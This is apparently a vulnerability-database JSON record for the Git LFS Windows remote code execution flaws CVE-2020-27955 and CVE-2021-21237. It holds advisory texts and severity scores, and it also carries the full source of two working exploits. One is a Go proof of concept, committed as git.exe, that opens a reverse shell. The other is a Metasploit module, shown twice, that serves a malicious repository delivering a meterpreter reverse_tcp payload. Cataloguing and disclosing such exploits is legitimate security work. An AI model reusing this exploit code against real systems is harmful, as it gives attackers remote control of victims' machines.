"2021-12-16T20:35:00", "cpe": ["cpe:/a:git_large_file_storage_project:git_large_file_storage:2.12.0"], "id": "CVE-2020-27955", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-27955", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:git_large_file_storage_project:git_large_file_storage:2.12.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:19:45", "description": "Git LFS is a command line extension for managing large files with Git. On Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems. This is the result of an incomplete fix for CVE-2020-27955. This issue occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator. Other than avoiding untrusted repositories or using a different operating system, there is no workaround. This is fixed in v2.13.2.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-15T18:15:00", "type": "cve", "title": "CVE-2021-21237", "cwe": ["CWE-426"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-01-29T22:18:00", "cpe": [], "id": "CVE-2021-21237", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21237", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "debiancve": [{"lastseen": "2023-06-06T14:55:12", "description": "Git LFS 2.12.0 allows Remote Code Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-05T15:15:00", "type": "debiancve", "title": "CVE-2020-27955", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2020-11-05T15:15:00", "id": "DEBIANCVE:CVE-2020-27955", "href": "https://security-tracker.debian.org/tracker/CVE-2020-27955", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:13:18", "description": "Git LFS is a command line extension for managing large files with Git. On Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems. This is the result of an incomplete fix for CVE-2020-27955. This issue occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator. Other than avoiding untrusted repositories or using a different operating system, there is no workaround. This is fixed in v2.13.2.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-15T18:15:00", "type": "debiancve", "title": "CVE-2021-21237", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-01-15T18:15:00", "id": "DEBIANCVE:CVE-2021-21237", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21237", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-06-06T16:40:50", "description": "Proof of concept git-lfs remote code execution exploit written in Go. Affects Git, GitHub CLI, GitHub Desktop, Visual Studio, GitKraken, SmartGit, SourceTree, and more.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-08T00:00:00", "type": "zdt", "title": "git-lfs Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2020-11-08T00:00:00", "id": "1337DAY-ID-35186", "href": "https://0day.today/exploit/description/35186", "sourceData": "/*\n Go PoC exploit for git-lfs - Remote Code Execution (RCE)\nvulnerability CVE-2020-27955\n git-lfs-RCE-exploit-CVE-2020-27955.go\n\n Discovered by Dawid Golunski\n https://legalhackers.com\n https://exploitbox.io\n\n\n Affected (RCE exploit):\n Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken /\nSmartGit / SourceTree etc.\n Basically the whole Windows dev world which uses git.\n\n Usage:\n Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go\n Save & commit as git.exe\n\n The payload should get executed automatically on git clone operation.\n It spawns a reverse shell, or a calc.exe for testing (if it\ncouldn't connect).\n\n An lfs-enabled repository with lfs files may also be needed so that git-lfs\ngets invoked. This can be achieved with:\n\n git lfs track \"*.dat\"\n echo \"fat bug file\" > lfsdata.dat\n git add .*\n git add *\n git commmit -m 'git-lfs exploit' -a\n\n Check out the full advisory for details:\n\n https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html\n\n https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html\n\n PoC video at:\n https://youtu.be/tlptOf9w274\n\n ** For testing purposes only **\n\n\n*/\n\npackage main\nimport (\n \"net\"\n \"os/exec\"\n \"bufio\"\n \"syscall\"\n)\n\n\nfunc revsh(host string) {\n\n c, err := net.Dial(\"tcp\", host)\n if nil != err {\n // Conn failed\n if nil != c {\n c.Close()\n }\n // Calc for testing purposes if no listener available\n cmd := exec.Command(\"calc\")\n cmd.Run()\n return\n }\n\n r := bufio.NewReader(c)\n for {\n runcmd, err := r.ReadString('\\n')\n if nil != err {\n c.Close()\n return\n }\n cmd := exec.Command(\"cmd\", \"/C\", runcmd)\n cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}\n out, _ := cmd.CombinedOutput()\n c.Write(out)\n }\n}\n\n// Connect to netcat listener on local port 1337\nfunc main() {\n revsh(\"localhost:1337\")\n}\n\n\n-- \nRegards,\nDawid Golunski\n", "sourceHref": "https://0day.today/exploit/35186", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T16:36:17", "description": "This Metasploit modules exploits a critical vulnerability in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, which allows attackers to achieve remote code execution if the Windows-using victim is tricked into cloning the attacker\u2019s malicious repository using a vulnerable Git version control tool.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-17T00:00:00", "type": "zdt", "title": "Git git-lfs Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-09-17T00:00:00", "id": "1337DAY-ID-36763", "href": "https://0day.today/exploit/description/36763", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Git\n include Msf::Exploit::Git::Lfs\n include Msf::Exploit::Git::SmartHttp\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Git Remote Code Execution via git-lfs (CVE-2020-27955)',\n 'Description' => %q{\n A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for\n versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked\n into cloning the attacker\u2019s malicious repository using a vulnerable Git version control tool\n },\n 'Author' => [\n 'Dawid Golunski ', # Discovery\n 'space-r7', # Guidance, git mixins\n 'jheysel-r7' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2020-27955'],\n ['URL', 'https://www.helpnetsecurity.com/2020/11/05/cve-2020-27955/']\n ],\n 'DisclosureDate' => '2020-11-04', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Git LFS <= 2.12',\n {\n 'Platform' => ['win']\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 10\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n ARTIFACTS_ON_DISK\n ]\n }\n )\n )\n\n register_options([\n OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])\n ])\n deregister_options('RHOSTS')\n end\n\n def setup_repo_structure\n payload_fname = 'git.exe'\n @hook_payload = generate_payload_exe\n\n ptr_file = generate_pointer_file(@hook_payload)\n git_payload_ptr = GitObject.build_blob_object(ptr_file)\n\n git_attr_fname = '.gitattributes'\n git_attr_content = \"#{payload_fname} filter=lfs diff=lfs merge=lfs\"\n git_attr_obj = GitObject.build_blob_object(git_attr_content)\n\n register_dir_for_cleanup('.git')\n register_files_for_cleanup(git_attr_fname)\n\n # root of repository\n tree_ent =\n [\n {\n mode: '100644',\n file_name: git_attr_fname,\n sha1: git_attr_obj.sha1\n },\n {\n mode: '100755',\n file_name: payload_fname,\n sha1: git_payload_ptr.sha1\n }\n ]\n\n tree_obj = GitObject.build_tree_object(tree_ent)\n commit = GitObject.build_commit_object(tree_sha1: tree_obj.sha1)\n\n @git_objs =\n [\n commit, tree_obj, git_attr_obj, git_payload_ptr\n ]\n\n @refs =\n {\n 'HEAD' => 'refs/heads/master',\n 'refs/heads/master' => commit.sha1\n }\n end\n\n #\n # Determine whether or not the target is exploitable based on the User-Agent header returned from the client.\n # The git version must be equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0 to be\n # exploitable by this vulnerability.\n #\n # Returns +true+ if the target is suitable, else fail_with descriptive message\n #\n def target_suitable?(user_agent)\n info = fingerprint_user_agent(user_agent)\n if info[:ua_name] == Msf::HttpClients::UNKNOWN\n fail_with(Failure::NoTarget, \"The client's User-Agent string was unidentifiable: #{info}. The client needs to clone the malicious repo on windows with a git version less than 2.29.0\")\n end\n\n if info[:os_name] == 'Windows' &&\n ((info[:ua_name] == Msf::HttpClients::GIT && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.29.2')) ||\n (info[:ua_name] == Msf::HttpClients::GIT_LFS && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.12')))\n true\n else\n fail_with(Failure::NotVulnerable, \"The git client needs to be running on Windows with a version equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0. The user agent, #{info[:ua_name]}, found was running on, #{info[:os_name]} and was at version: #{info[:ua_ver]}\")\n end\n end\n\n def on_request_uri(cli, req)\n target_suitable?(req.headers['User-Agent'])\n if req.uri.include?('git-upload-pack')\n request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)\n case request.type\n when 'ref-discovery'\n response = send_refs(request)\n when 'upload-pack'\n response = send_requested_objs(request)\n else\n fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')\n end\n else\n response = handle_lfs_objects(req, @hook_payload, @git_addr)\n unless response.code == 200\n cli.send_response(response)\n fail_with(Failure::UnexpectedReply, 'Failed to respond to Git client\\'s LFS request')\n end\n end\n cli.send_response(response)\n end\n\n def create_git_uri\n \"/#{Faker::App.name.downcase}.git\".gsub(' ', '-')\n end\n\n def primer\n @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']\n @git_addr = URI.parse(get_uri).merge(@git_repo_uri)\n print_status(\"Git repository to clone: #{@git_addr}\")\n hardcoded_uripath(@git_repo_uri)\n hardcoded_uripath(\"/#{Digest::SHA256.hexdigest(@hook_payload)}\")\n end\n\n def handle_lfs_objects(req, hook_payload, git_addr)\n git_hook_obj = GitObject.build_blob_object(hook_payload)\n\n case req.method\n when 'POST'\n print_status('Sending payload data...')\n response = get_batch_response(req, git_addr, git_hook_obj)\n fail_with(Failure::UnexpectedReply, 'Client request was invalid') unless response\n when 'GET'\n print_status('Sending LFS object...')\n response = get_requested_obj_response(req, git_hook_obj)\n fail_with(Failure::UnexpectedReply, 'Client sent invalid request') unless response\n else\n fail_with(Failure::UnexpectedReply, 'Unable to handle client\\'s request')\n end\n\n response\n end\n\n def send_refs(req)\n fail_with(Failure::UnexpectedReply, 'Git client did not perform a clone') unless req.service == 'git-upload-pack'\n\n response = get_ref_discovery_response(req, @refs)\n fail_with(Failure::UnexpectedReply, 'Failed to build a proper response to the ref discovery request') unless response\n\n response\n end\n\n def send_requested_objs(req)\n upload_pack_resp = get_upload_pack_response(req, @git_objs)\n unless upload_pack_resp\n fail_with(Failure::UnexpectedReply, 'Could not generate upload-pack response')\n end\n\n upload_pack_resp\n end\n\n def exploit\n setup_repo_structure\n super\n end\nend\n", "sourceHref": "https://0day.today/exploit/36763", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-06T17:06:33", "description": "A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked into cloning the attacker\u2019s malicious repository using a vulnerable Git version control tool\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-03T21:15:38", "type": "metasploit", "title": "Git Remote Code Execution via git-lfs (CVE-2020-27955)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-09-14T20:32:25", "id": "MSF:EXPLOIT-WINDOWS-HTTP-GIT_LFS_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/git_lfs_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Git\n include Msf::Exploit::Git::Lfs\n include Msf::Exploit::Git::SmartHttp\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Git Remote Code Execution via git-lfs (CVE-2020-27955)',\n 'Description' => %q{\n A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for\n versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked\n into cloning the attacker\u2019s malicious repository using a vulnerable Git version control tool\n },\n 'Author' => [\n 'Dawid Golunski ', # Discovery\n 'space-r7', # Guidance, git mixins\n 'jheysel-r7' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2020-27955'],\n ['URL', 'https://www.helpnetsecurity.com/2020/11/05/cve-2020-27955/']\n ],\n 'DisclosureDate' => '2020-11-04', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Git LFS <= 2.12',\n {\n 'Platform' => ['win']\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 10\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n ARTIFACTS_ON_DISK\n ]\n }\n )\n )\n\n register_options([\n OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])\n ])\n deregister_options('RHOSTS')\n end\n\n def setup_repo_structure\n payload_fname = 'git.exe'\n @hook_payload = generate_payload_exe\n\n ptr_file = generate_pointer_file(@hook_payload)\n git_payload_ptr = GitObject.build_blob_object(ptr_file)\n\n git_attr_fname = '.gitattributes'\n git_attr_content = \"#{payload_fname} filter=lfs diff=lfs merge=lfs\"\n git_attr_obj = GitObject.build_blob_object(git_attr_content)\n\n register_dir_for_cleanup('.git')\n register_files_for_cleanup(git_attr_fname)\n\n # root of repository\n tree_ent =\n [\n {\n mode: '100644',\n file_name: git_attr_fname,\n sha1: git_attr_obj.sha1\n },\n {\n mode: '100755',\n file_name: payload_fname,\n sha1: git_payload_ptr.sha1\n }\n ]\n\n tree_obj = GitObject.build_tree_object(tree_ent)\n commit = GitObject.build_commit_object(tree_sha1: tree_obj.sha1)\n\n @git_objs =\n [\n commit, tree_obj, git_attr_obj, git_payload_ptr\n ]\n\n @refs =\n {\n 'HEAD' => 'refs/heads/master',\n 'refs/heads/master' => commit.sha1\n }\n end\n\n #\n # Determine whether or not the target is exploitable based on the User-Agent header returned from the client.\n # The git version must be equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0 to be\n # exploitable by this vulnerability.\n #\n # Returns +true+ if the target is suitable, else fail_with descriptive message\n #\n def target_suitable?(user_agent)\n info = fingerprint_user_agent(user_agent)\n if info[:ua_name] == Msf::HttpClients::UNKNOWN\n fail_with(Failure::NoTarget, \"The client's User-Agent string was unidentifiable: #{info}. The client needs to clone the malicious repo on windows with a git version less than 2.29.0\")\n end\n\n if info[:os_name] == 'Windows' &&\n ((info[:ua_name] == Msf::HttpClients::GIT && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.29.2')) ||\n (info[:ua_name] == Msf::HttpClients::GIT_LFS && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.12')))\n true\n else\n fail_with(Failure::NotVulnerable, \"The git client needs to be running on Windows with a version equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0. The user agent, #{info[:ua_name]}, found was running on, #{info[:os_name]} and was at version: #{info[:ua_ver]}\")\n end\n end\n\n def on_request_uri(cli, req)\n target_suitable?(req.headers['User-Agent'])\n if req.uri.include?('git-upload-pack')\n request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)\n case request.type\n when 'ref-discovery'\n response = send_refs(request)\n when 'upload-pack'\n response = send_requested_objs(request)\n else\n fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')\n end\n else\n response = handle_lfs_objects(req, @hook_payload, @git_addr)\n unless response.code == 200\n cli.send_response(response)\n fail_with(Failure::UnexpectedReply, 'Failed to respond to Git client\\'s LFS request')\n end\n end\n cli.send_response(response)\n end\n\n def create_git_uri\n \"/#{Faker::App.name.downcase}.git\".gsub(' ', '-')\n end\n\n def primer\n @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']\n @git_addr = URI.parse(get_uri).merge(@git_repo_uri)\n print_status(\"Git repository to clone: #{@git_addr}\")\n hardcoded_uripath(@git_repo_uri)\n hardcoded_uripath(\"/#{Digest::SHA256.hexdigest(@hook_payload)}\")\n end\n\n def handle_lfs_objects(req, hook_payload, git_addr)\n git_hook_obj = GitObject.build_blob_object(hook_payload)\n\n case req.method\n when 'POST'\n print_status('Sending payload data...')\n response = get_batch_response(req, git_addr, git_hook_obj)\n fail_with(Failure::UnexpectedReply, 'Client request was invalid') unless response\n when 'GET'\n print_status('Sending LFS object...')\n response = get_requested_obj_response(req, git_hook_obj)\n fail_with(Failure::UnexpectedReply, 'Client sent invalid request') unless response\n else\n fail_with(Failure::UnexpectedReply, 'Unable to handle client\\'s request')\n end\n\n response\n end\n\n def send_refs(req)\n fail_with(Failure::UnexpectedReply, 'Git client did not perform a clone') unless req.service == 'git-upload-pack'\n\n response = get_ref_discovery_response(req, @refs)\n fail_with(Failure::UnexpectedReply, 'Failed to build a proper response to the ref discovery request') unless response\n\n response\n end\n\n def send_requested_objs(req)\n upload_pack_resp = get_upload_pack_response(req, @git_objs)\n unless upload_pack_resp\n fail_with(Failure::UnexpectedReply, 'Could not generate upload-pack response')\n end\n\n upload_pack_resp\n end\n\n def exploit\n setup_repo_structure\n super\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/git_lfs_rce.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "github": [{"lastseen": "2023-06-06T15:19:40", "description": "### Impact\nOn Windows, if Git LFS operates on a malicious repository with a `git.bat` or `git.exe` file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.\n\nThis occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator.\n\n### Patches\nThis version should be patched in v2.12.1, which will be released in coordination with this security advisory.\n\n### Workarounds\nOther than avoiding untrusted repositories, there is no workaround.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Start a discussion in [the Git LFS discussion page](https://github.com/git-lfs/git-lfs/discussions).\n* If you cannot open a discussion, please email the core team using their usernames at `github.com`.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-11T23:39:18", "type": "github", "title": "Git LFS can execute a Git binary from the current directory", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2023-02-01T05:05:55", "id": "GHSA-4G4P-42WC-9F3M", "href": "https://github.com/advisories/GHSA-4g4p-42wc-9f3m", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:15:26", "description": "### Impact\nOn Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems.\n\nThis is the result of an incomplete fix for CVE-2020-27955.\n\nThis issue occurs because on Windows, [Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator](https://github.com/golang/go/issues/38736).\n\n### Patches\nThis version should be patched in v2.13.2, which will be released in coordination with this security advisory.\n\n### Workarounds\nOther than avoiding untrusted repositories or using a different operating system, there is no workaround.\n\n### References\n_Are there any links users can visit to find out more?_\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n- Start a discussion in [the Git LFS discussion page](https://github.com/git-lfs/git-lfs/discussions).\n- If you cannot open a discussion, please email the core team using their usernames at `github.com`.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-15T00:30:37", "type": "github", "title": "Git LFS can execute a Git binary from the current directory on Windows", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2023-02-14T20:55:19", "id": "GHSA-CX3W-XQMC-84G5", "href": "https://github.com/advisories/GHSA-cx3w-xqmc-84g5", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "alpinelinux": [{"lastseen": "2023-06-10T23:04:31", "description": "Git LFS 2.12.0 allows Remote Code Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 